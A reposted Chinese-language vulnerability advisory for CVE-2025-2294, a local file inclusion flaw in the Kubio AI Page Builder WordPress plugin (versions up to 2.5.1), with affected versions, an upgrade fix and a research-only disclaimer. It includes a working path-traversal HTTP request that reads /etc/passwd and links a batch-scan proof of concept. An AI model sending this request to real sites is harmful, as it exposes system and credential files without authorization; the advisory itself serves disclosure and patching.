漏洞介绍
WordPress的Kubio AI Page Builder插件在2.5.1及之前所有版本中,存在通过 kubio_hybrid_theme_load_template函数触发的本地文件包含漏洞。该漏洞允许未经身份验证的攻击者包含并执行服务器上的任意文件,从而运行这些文件中的任何PHP代码。攻击者可利用此漏洞绕过访问控制、获取敏感数据。
该插件目前有10万+的活跃安装次数,可谓使用范围非常广;
该漏洞利用无需任何利用前置条件,可谓利用条件非常简单。所以CVE官方也是给出了9.8的CVSS超高评分。
漏洞版本
-
Kubio AI Page Builder插件版本 <= 2.5.1
漏洞利用
使用如下POC进行漏洞利用读取到目标 /etc/passwd文件
GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../../etc/passwd HTTP/1.1 Host: yourdomain.com
批量检测脚本
POC
https://github.com/Nxploited/CVE-2025-2294
漏洞修复
-
升级到 2.5.1 以上版本
原文始发于微信公众号(天翁安全):WordPress前台任意文件读取漏洞POC(CVE-2025-2294)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论